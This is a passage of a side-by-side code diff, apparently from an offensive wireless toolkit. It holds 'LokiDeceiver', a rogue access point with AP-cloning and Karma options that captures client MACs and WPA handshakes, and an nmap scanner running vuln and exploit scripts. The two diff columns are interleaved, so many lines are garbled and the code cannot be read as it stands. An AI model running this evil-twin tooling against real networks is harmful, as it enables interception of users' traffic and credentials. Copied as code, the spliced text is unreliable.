def setup_interface(self): def _setup_monitor_mode(self, iface: str):
"""Configure wireless interface for AP mode.""" logger.info(f"LokiDeceiver: Setting {iface} to monitor mode...")
try: subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], capture_output=True)
# Kill potentially interfering processes subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'down'], capture_output=True)
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], subprocess.run(['sudo', 'iw', iface, 'set', 'type', 'monitor'], capture_output=True)
stdout=subprocess.PIPE, stderr=subprocess.PIPE) subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
# Stop NetworkManager
subprocess.run(['sudo', 'systemctl', 'stop', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Save original MAC
self.original_mac = self.get_interface_mac()
# Enable monitor mode
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'monitor', 'none'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info(f"Interface {self.interface} configured in monitor mode")
return True
except Exception as e:
logging.error(f"Failed to setup interface: {e}")
return False
def get_interface_mac(self): def _create_configs(self, iface, ssid, channel, password):
"""Get the MAC address of the wireless interface.""" # hostapd.conf
try: h_conf = [
result = subprocess.run(['ip', 'link', 'show', self.interface], f'interface={iface}',
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) 'driver=nl80211',
if result.returncode == 0: f'ssid={ssid}',
mac = re.search(r'link/ether ([0-9a-f:]{17})', result.stdout) 'hw_mode=g',
if mac: f'channel={channel}',
return mac.group(1) 'macaddr_acl=0',
except Exception as e: 'ignore_broadcast_ssid=0'
logging.error(f"Failed to get interface MAC: {e}") ]
return None if password:
h_conf.extend([
'auth_algs=1',
'wpa=2',
f'wpa_passphrase={password}',
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
h_path = '/tmp/bjorn_hostapd.conf'
with open(h_path, 'w') as f:
f.write('\n'.join(h_conf))
def create_ap_config(self): # dnsmasq.conf
"""Create configuration for hostapd.""" d_conf = [
try: f'interface={iface}',
config = [ 'dhcp-range=192.168.1.10,192.168.1.100,255.255.255.0,12h',
'interface=' + self.interface, 'dhcp-option=3,192.168.1.1',
'driver=nl80211', 'dhcp-option=6,192.168.1.1',
'ssid=' + self.ssid, 'server=8.8.8.8',
'hw_mode=g', 'log-queries',
'channel=' + str(self.channel), 'log-dhcp'
'macaddr_acl=0', ]
'ignore_broadcast_ssid=0' d_path = '/tmp/bjorn_dnsmasq.conf'
] with open(d_path, 'w') as f:
f.write('\n'.join(d_conf))
if self.password:
config.extend([ return h_path, d_path
'auth_algs=1',
'wpa=2',
'wpa_passphrase=' + self.password,
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
config_path = '/tmp/hostapd.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
return config_path
except Exception as e:
logging.error(f"Failed to create AP config: {e}")
return None
def setup_dhcp(self): def _packet_callback(self, packet):
"""Configure DHCP server using dnsmasq.""" if self.shared_data.orchestrator_should_exit:
try:
config = [
'interface=' + self.interface,
'dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
config_path = '/tmp/dnsmasq.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
# Configure interface IP
subprocess.run(['sudo', 'ifconfig', self.interface, '192.168.1.1', 'netmask', '255.255.255.0'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return config_path
except Exception as e:
logging.error(f"Failed to setup DHCP: {e}")
return None
def start_ap(self):
"""Start the fake access point."""
try:
if not self.setup_interface():
return False
hostapd_config = self.create_ap_config()
dhcp_config = self.setup_dhcp()
if not hostapd_config or not dhcp_config:
return False
# Start hostapd
self.hostapd_process = subprocess.Popen(
['sudo', 'hostapd', hostapd_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start dnsmasq
self.dnsmasq_process = subprocess.Popen(
['sudo', 'dnsmasq', '-C', dhcp_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.active = True
logging.info(f"Access point {self.ssid} started on channel {self.channel}")
# Start packet capture
self.start_capture()
return True
except Exception as e:
logging.error(f"Failed to start AP: {e}")
return False
def start_capture(self):
"""Start capturing wireless traffic."""
try:
# Start tcpdump for capturing handshakes
handshake_path = os.path.join(self.output_dir, 'handshakes')
os.makedirs(handshake_path, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
pcap_file = os.path.join(handshake_path, f"capture_{timestamp}.pcap")
self.tcpdump_process = subprocess.Popen(
['sudo', 'tcpdump', '-i', self.interface, '-w', pcap_file],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start sniffing in a separate thread
self.sniffer_thread = threading.Thread(target=self.packet_sniffer)
self.sniffer_thread.start()
except Exception as e:
logging.error(f"Failed to start capture: {e}")
def packet_sniffer(self):
"""Sniff and process packets."""
try:
scapy.sniff(iface=self.interface, prn=self.process_packet, store=0,
stop_filter=lambda p: not self.active)
except Exception as e:
logging.error(f"Sniffer error: {e}")
def process_packet(self, packet):
"""Process captured packets."""
try:
if packet.haslayer(Dot11):
# Process authentication attempts
if packet.type == 0 and packet.subtype == 11: # Authentication
self.process_auth(packet)
# Process association requests
elif packet.type == 0 and packet.subtype == 0: # Association request
self.process_assoc(packet)
# Process EAPOL packets for handshakes
elif packet.haslayer(EAPOL):
self.process_handshake(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
def process_auth(self, packet):
"""Process authentication packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'auth',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing auth packet: {e}")
def process_assoc(self, packet):
"""Process association packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'assoc',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing assoc packet: {e}")
def process_handshake(self, packet):
"""Process EAPOL packets for handshakes."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_handshakes.append({
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing handshake packet: {e}")
def save_results(self):
"""Save captured data to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'ap_info': {
'ssid': self.ssid,
'channel': self.channel,
'interface': self.interface
},
'credentials': self.captured_credentials,
'handshakes': self.captured_handshakes
}
output_file = os.path.join(self.output_dir, f"results_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def cleanup(self):
"""Clean up resources and restore interface."""
try:
self.active = False
# Stop processes
for process in [self.hostapd_process, self.dnsmasq_process, self.tcpdump_process]:
if process:
process.terminate()
process.wait()
# Restore interface
if self.original_mac:
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'type', 'managed'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Restart NetworkManager
subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info("Cleanup completed")
except Exception as e:
logging.error(f"Error during cleanup: {e}")
def save_settings(interface, ssid, channel, password, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"ssid": ssid,
"channel": channel,
"password": password,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="WiFi deception tool")
parser.add_argument("-i", "--interface", default="wlan0", help="Wireless interface")
parser.add_argument("-s", "--ssid", help="SSID for fake AP")
parser.add_argument("-c", "--channel", type=int, default=6, help="WiFi channel")
parser.add_argument("-p", "--password", help="WPA2 password")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
# Honeypot options
parser.add_argument("--captive-portal", action="store_true", help="Enable captive portal")
parser.add_argument("--clone-ap", help="SSID to clone and impersonate")
parser.add_argument("--karma", action="store_true", help="Enable Karma attack mode")
# Advanced options
parser.add_argument("--beacon-interval", type=int, default=100, help="Beacon interval in ms")
parser.add_argument("--max-clients", type=int, default=10, help="Maximum number of clients")
parser.add_argument("--timeout", type=int, help="Runtime duration in seconds")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
ssid = args.ssid or settings.get("ssid")
channel = args.channel or settings.get("channel")
password = args.password or settings.get("password")
output_dir = args.output or settings.get("output_dir")
# Load advanced settings
captive_portal = args.captive_portal or settings.get("captive_portal", False)
clone_ap = args.clone_ap or settings.get("clone_ap")
karma = args.karma or settings.get("karma", False)
beacon_interval = args.beacon_interval or settings.get("beacon_interval", 100)
max_clients = args.max_clients or settings.get("max_clients", 10)
timeout = args.timeout or settings.get("timeout")
if not interface:
logging.error("Interface is required. Use -i or save it in settings")
return
# Clone AP if requested
if clone_ap:
logging.info(f"Attempting to clone AP: {clone_ap}")
clone_info = scan_for_ap(interface, clone_ap)
if clone_info:
ssid = clone_info['ssid']
channel = clone_info['channel']
logging.info(f"Successfully cloned AP settings: {ssid} on channel {channel}")
else:
logging.error(f"Failed to find AP to clone: {clone_ap}")
return return
# Save all settings if packet.haslayer(Dot11):
save_settings( addr2 = packet.addr2 # Source MAC
interface=interface, if addr2 and addr2 not in self.active_clients:
ssid=ssid, # Association request or Auth
channel=channel, if packet.type == 0 and packet.subtype in [0, 11]:
password=password, with self.lock:
output_dir=output_dir, self.active_clients.add(addr2)
captive_portal=captive_portal, logger.success(f"LokiDeceiver: New client detected: {addr2}")
clone_ap=clone_ap, self.shared_data.log_milestone(b_class, "ClientConnected", f"MAC: {addr2}")
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients,
timeout=timeout
)
# Create and configure deceiver
deceiver = LokiDeceiver(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients
)
try:
# Start the deception
if deceiver.start():
logging.info(f"Access point {ssid} started on channel {channel}")
if timeout: if EAPOL and packet.haslayer(EAPOL):
logging.info(f"Running for {timeout} seconds") logger.success(f"LokiDeceiver: EAPOL packet captured from {addr2}")
time.sleep(timeout) self.shared_data.log_milestone(b_class, "Handshake", f"EAPOL from {addr2}")
deceiver.stop()
else: def execute(self, ip, port, row, status_key) -> str:
logging.info("Press Ctrl+C to stop") iface = getattr(self.shared_data, "loki_deceiver_interface", "wlan0")
while True: ssid = getattr(self.shared_data, "loki_deceiver_ssid", "Bjorn_AP")
time.sleep(1) channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
password = getattr(self.shared_data, "loki_deceiver_password", "")
except KeyboardInterrupt: timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
logging.info("Stopping Loki Deceiver...") output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
except Exception as e:
logging.error(f"Unexpected error: {e}") logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
finally: self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
deceiver.stop()
logging.info("Cleanup completed") try:
self.stop_event.clear()
# self._setup_monitor_mode(iface) # Optional depending on driver
h_path, d_path = self._create_configs(iface, ssid, channel, password)
# Set IP for interface
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
# Start processes
# Use DEVNULL to avoid blocking on unread PIPE buffers.
self.hostapd_proc = subprocess.Popen(
['sudo', 'hostapd', h_path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
self.dnsmasq_proc = subprocess.Popen(
['sudo', 'dnsmasq', '-C', d_path, '-k'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Start sniffer (must be stoppable to avoid leaking daemon threads).
if HAS_SCAPY and scapy and AsyncSniffer:
try:
self._sniffer = AsyncSniffer(iface=iface, prn=self._packet_callback, store=False)
self._sniffer.start()
except Exception as sn_e:
logger.warning(f"LokiDeceiver: sniffer start failed: {sn_e}")
self._sniffer = None
start_time = time.time()
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# Check if procs still alive
if self.hostapd_proc.poll() is not None:
logger.error("LokiDeceiver: hostapd crashed.")
break
# Progress report
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
time.sleep(2)
logger.info("LokiDeceiver: Stopping AP.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stopping Rogue AP")
except Exception as e:
logger.error(f"LokiDeceiver error: {e}")
return "failed"
finally:
self.stop_event.set()
if self._sniffer is not None:
try:
self._sniffer.stop()
except Exception:
pass
self._sniffer = None
# Cleanup
for p in [self.hostapd_proc, self.dnsmasq_proc]:
if p:
try: p.terminate(); p.wait(timeout=5)
except: pass
# Restore NetworkManager if needed (custom logic based on usage)
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
return "success"
if __name__ == "__main__": if __name__ == "__main__":
# Set process niceness to high priority from init_shared import shared_data
try: loki = LokiDeceiver(shared_data)
os.nice(-10) loki.execute("0.0.0.0", None, {}, "loki_deceiver")
except:
logging.warning("Failed to set process priority. Running with default priority.")
# Start main function
main()

View File

@@ -2,13 +2,16 @@
Vulnerability Scanner Action Vulnerability Scanner Action
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo), Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
avec fallback "lourd" optionnel. avec fallback "lourd" optionnel.
Affiche une progression en % dans Bjorn.
""" """
import re
import time
import nmap import nmap
import json import json
import logging import logging
from typing import Dict, List, Set, Any, Optional
from datetime import datetime, timedelta from datetime import datetime, timedelta
from typing import Dict, List, Any
from shared import SharedData from shared import SharedData
from logger import Logger from logger import Logger
@@ -22,41 +25,47 @@ b_port = None
b_parent = None b_parent = None
b_action = "normal" b_action = "normal"
b_service = [] b_service = []
b_trigger = "on_port_change" b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}' b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11 b_priority = 11
b_cooldown = 0 b_cooldown = 0
b_enabled = 1 b_enabled = 1
b_rate_limit = None b_rate_limit = None
# Regex compilé une seule fois (gain CPU sur Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
class NmapVulnScanner: class NmapVulnScanner:
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE).""" """Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
def __init__(self, shared_data: SharedData): def __init__(self, shared_data: SharedData):
self.shared_data = shared_data self.shared_data = shared_data
self.nm = nmap.PortScanner() # Pas de self.nm partagé : on instancie dans chaque méthode de scan
# pour éviter les corruptions d'état entre batches.
logger.info("NmapVulnScanner initialized") logger.info("NmapVulnScanner initialized")
# ---------------------------- Public API ---------------------------- # # ---------------------------- Public API ---------------------------- #
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str: def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try: try:
logger.info(f"🔍 Starting vulnerability scan for {ip}") logger.info(f"Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner" self.shared_data.bjorn_orch_status = "NmapVulnScanner"
self.shared_data.bjorn_progress = "0%"
# 1) metadata depuis la queue if self.shared_data.orchestrator_should_exit:
return 'failed'
# 1) Metadata
meta = {} meta = {}
try: try:
meta = json.loads(row.get('metadata') or '{}') meta = json.loads(row.get('metadata') or '{}')
except Exception: except Exception:
pass pass
# 2) récupérer MAC et TOUS les ports de l'hôte # 2) Récupérer MAC et TOUS les ports
mac = row.get("MAC Address") or row.get("mac_address") or "" mac = row.get("MAC Address") or row.get("mac_address") or ""
# ✅ FORCER la récupération de TOUS les ports depuis la DB
ports_str = "" ports_str = ""
if mac: if mac:
r = self.shared_data.db.query( r = self.shared_data.db.query(
@@ -64,8 +73,7 @@ class NmapVulnScanner:
) )
if r and r[0].get('ports'): if r and r[0].get('ports'):
ports_str = r[0]['ports'] ports_str = r[0]['ports']
# Fallback sur les métadonnées si besoin
if not ports_str: if not ports_str:
ports_str = ( ports_str = (
row.get("Ports") or row.get("ports") or row.get("Ports") or row.get("ports") or
@@ -73,143 +81,240 @@ class NmapVulnScanner:
) )
if not ports_str: if not ports_str:
logger.warning(f"⚠️ No ports to scan for {ip}") logger.warning(f"No ports to scan for {ip}")
self.shared_data.bjorn_progress = ""
return 'failed' return 'failed'
ports = [p.strip() for p in ports_str.split(';') if p.strip()] ports = [p.strip() for p in ports_str.split(';') if p.strip()]
logger.debug(f"📋 Found {len(ports)} ports for {ip}: {ports[:5]}...")
# ✅ FIX : Ne filtrer QUE si config activée ET déjà scanné # Nettoyage des ports (garder juste le numéro si format 80/tcp)
ports = [p.split('/')[0] for p in ports]
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
# 3) Filtrage "Rescan Only"
if self.shared_data.config.get('vuln_rescan_on_change_only', False): if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac): if self._has_been_scanned(mac):
original_count = len(ports) original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports) ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"🔄 Filtered {original_count - len(ports)} already-scanned ports") logger.debug(f"Filtered {original_count - len(ports)} already-scanned ports")
if not ports: if not ports:
logger.info(f"No new/changed ports to scan for {ip}") logger.info(f"No new/changed ports to scan for {ip}")
self.shared_data.bjorn_progress = "100%"
return 'success' return 'success'
# Scanner (mode rapide par défaut) # 4) SCAN AVEC PROGRESSION
logger.info(f"🚀 Starting nmap scan on {len(ports)} ports for {ip}") if self.shared_data.orchestrator_should_exit:
return 'failed'
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports) findings = self.scan_vulnerabilities(ip, ports)
# Persistance (split CVE/CPE) if self.shared_data.orchestrator_should_exit:
logger.info("Scan interrupted by user")
return 'failed'
# 5) Déduplication en mémoire avant persistance
findings = self._deduplicate_findings(findings)
# 6) Persistance
self.save_vulnerabilities(mac, ip, findings) self.save_vulnerabilities(mac, ip, findings)
logger.success(f"✅ Vuln scan done on {ip}: {len(findings)} entries")
# Finalisation UI
self.shared_data.bjorn_progress = "100%"
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
return 'success' return 'success'
except Exception as e: except Exception as e:
logger.error(f"NmapVulnScanner failed for {ip}: {e}") logger.error(f"NmapVulnScanner failed for {ip}: {e}")
self.shared_data.bjorn_progress = "Error"
return 'failed' return 'failed'
def _has_been_scanned(self, mac: str) -> bool: def _has_been_scanned(self, mac: str) -> bool:
"""Vérifie si l'hôte a déjà été scanné au moins une fois."""
rows = self.shared_data.db.query(""" rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner' WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed') AND status IN ('success', 'failed')
LIMIT 1 LIMIT 1
""", (mac,)) """, (mac,))
return bool(rows) return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]: def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
"""
Retourne la liste des ports à scanner en excluant ceux déjà scannés récemment.
"""
if not ports: if not ports:
return [] return []
# Ports déjà couverts par detected_software (is_active=1)
rows = self.shared_data.db.query(""" rows = self.shared_data.db.query("""
SELECT port, last_seen SELECT port, last_seen
FROM detected_software FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,)) """, (mac,))
seen = {} seen = {}
for r in rows: for r in rows:
try: try:
p = str(r['port']) seen[str(r['port'])] = r.get('last_seen')
ls = r.get('last_seen')
seen[p] = ls
except Exception: except Exception:
pass pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0) ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0: if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl) cutoff = datetime.utcnow() - timedelta(seconds=ttl)
def fresh(port: str) -> bool: final_ports = []
ls = seen.get(port) for p in ports:
if not ls: if p not in seen:
return False final_ports.append(p)
try: else:
dt = datetime.fromisoformat(ls.replace('Z','')) try:
return dt >= cutoff dt = datetime.fromisoformat(seen[p].replace('Z', ''))
except Exception: if dt < cutoff:
return True final_ports.append(p)
return [p for p in ports if (p not in seen) or (not fresh(p))] except Exception:
pass
return final_ports
else: else:
# Sans TTL: si déjà scanné/présent actif => on skip
return [p for p in ports if p not in seen] return [p for p in ports if p not in seen]
# ---------------------------- Scanning ------------------------------ # # ---------------------------- Helpers -------------------------------- #
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
"""Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
seen: set = set()
deduped = []
for f in findings:
key = (str(f.get('port', '')), str(f.get('vuln_id', '')))
if key not in seen:
seen.add(key)
deduped.append(f)
return deduped
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
return [x.strip() for x in cpe.splitlines() if x.strip()]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
return [str(cpe).strip()]
def extract_cves(self, text: str) -> List[str]:
"""Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
if not text:
return []
return CVE_RE.findall(str(text))
# ---------------------------- Scanning (Batch Mode) ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]: def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""Mode rapide CPE/CVE ou fallback lourd.""" """
fast = bool(self.shared_data.config.get('vuln_fast', True)) Orchestre le scan en lots (batches) pour permettre la mise à jour
de la barre de progression.
"""
all_findings = []
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False)) use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20)) max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
p_list = [str(p).split('/')[0] for p in ports if str(p).strip()] # Pause entre batches important sur Pi Zero pour laisser respirer le CPU
port_list = ','.join(p_list[:max_ports]) if p_list else '' batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
if not port_list: # Taille de lot réduite par défaut (2 sur Pi Zero, configurable)
logger.warning("No valid ports for scan") batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
target_ports = ports[:max_ports]
total = len(target_ports)
if total == 0:
return [] return []
if fast: batches = [target_ports[i:i + batch_size] for i in range(0, total, batch_size)]
return self._scan_fast_cpe_cve(ip, port_list, use_vulners)
else: processed_count = 0
return self._scan_heavy(ip, port_list)
for batch in batches:
if self.shared_data.orchestrator_should_exit:
break
port_str = ','.join(batch)
# Mise à jour UI avant le scan du lot
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
self.shared_data.comment_params = {
"ip": ip,
"progress": f"{processed_count}/{total} ports",
"current_batch": port_str
}
t0 = time.time()
# Scan du lot (instanciation locale pour éviter la corruption d'état)
if fast:
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
else:
batch_findings = self._scan_heavy(ip, port_str)
elapsed = time.time() - t0
logger.debug(f"Batch [{port_str}] scanned in {elapsed:.1f}s {len(batch_findings)} finding(s)")
all_findings.extend(batch_findings)
processed_count += len(batch)
# Mise à jour post-lot
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
# Pause CPU entre batches (vital sur Pi Zero)
if batch_pause > 0 and processed_count < total:
time.sleep(batch_pause)
return all_findings
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]: def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
"""Scan rapide pour récupérer CPE et (option) CVE via vulners."""
vulns: List[Dict] = [] vulns: List[Dict] = []
nm = nmap.PortScanner() # Instance locale pas de partage d'état
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 30s --script-timeout 10s" # --version-light au lieu de --version-all : bien plus rapide sur Pi Zero
# --min-rate/--max-rate : évite de saturer CPU et réseau
args = (
"-sV --version-light -T4 "
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
"--min-rate 50 --max-rate 100"
)
if use_vulners: if use_vulners:
args += " --script vulners --script-args mincvss=0.0" args += " --script vulners --script-args mincvss=0.0"
logger.info(f"[FAST] nmap {ip} -p {port_list} ({args})") logger.debug(f"[FAST] nmap {ip} -p {port_list}")
try: try:
self.nm.scan(hosts=ip, ports=port_list, arguments=args) nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e: except Exception as e:
logger.error(f"Fast scan failed to start: {e}") logger.error(f"Fast batch scan failed for {ip} [{port_list}]: {e}")
return vulns return vulns
if ip not in self.nm.all_hosts(): if ip not in nm.all_hosts():
return vulns return vulns
host = self.nm[ip] host = nm[ip]
for proto in host.all_protocols(): for proto in host.all_protocols():
for port in host[proto].keys(): for port in host[proto].keys():
port_info = host[proto][port] port_info = host[proto][port]
service = port_info.get('name', '') or '' service = port_info.get('name', '') or ''
# 1) CPE depuis -sV # CPE
cpe_values = self._extract_cpe_values(port_info) for cpe in self._extract_cpe_values(port_info):
for cpe in cpe_values:
vulns.append({ vulns.append({
'port': port, 'port': port,
'service': service, 'service': service,
'vuln_id': f"CPE:{cpe}", 'vuln_id': f"CPE:{cpe}",
'script': 'service-detect', 'script': 'service-detect',
'details': f"CPE detected: {cpe}"[:500] 'details': f"CPE: {cpe}"
}) })
# 2) CVE via script 'vulners' (si actif) # CVE via vulners
try: if use_vulners:
script_out = (port_info.get('script') or {}).get('vulners') script_out = (port_info.get('script') or {}).get('vulners')
if script_out: if script_out:
for cve in self.extract_cves(script_out): for cve in self.extract_cves(script_out):
@@ -218,97 +323,73 @@ class NmapVulnScanner:
'service': service, 'service': service,
'vuln_id': cve, 'vuln_id': cve,
'script': 'vulners', 'script': 'vulners',
'details': str(script_out)[:500] 'details': str(script_out)[:200]
}) })
except Exception:
pass
return vulns return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]: def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
"""Ancienne stratégie (plus lente) avec catégorie vuln, etc."""
vulnerabilities: List[Dict] = [] vulnerabilities: List[Dict] = []
nm = nmap.PortScanner() # Instance locale
vuln_scripts = [ vuln_scripts = [
'vuln','exploit','http-vuln-*','smb-vuln-*', 'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
'ssl-*','ssh-*','ftp-vuln-*','mysql-vuln-*', 'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
] ]
script_arg = ','.join(vuln_scripts) script_arg = ','.join(vuln_scripts)
# --min-rate/--max-rate pour ne pas saturer le Pi
args = (
f"-sV --script={script_arg} -T3 "
"--script-timeout 30s --min-rate 50 --max-rate 100"
)
args = f"-sV --script={script_arg} -T3 --script-timeout 20s" logger.debug(f"[HEAVY] nmap {ip} -p {port_list}")
logger.info(f"[HEAVY] nmap {ip} -p {port_list} ({args})")
try: try:
self.nm.scan(hosts=ip, ports=port_list, arguments=args) nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e: except Exception as e:
logger.error(f"Heavy scan failed to start: {e}") logger.error(f"Heavy batch scan failed for {ip} [{port_list}]: {e}")
return vulnerabilities return vulnerabilities
if ip in self.nm.all_hosts(): if ip not in nm.all_hosts():
host = self.nm[ip] return vulnerabilities
discovered_ports: Set[str] = set()
for proto in host.all_protocols(): host = nm[ip]
for port in host[proto].keys(): discovered_ports_in_batch: set = set()
discovered_ports.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
if 'script' in port_info: for proto in host.all_protocols():
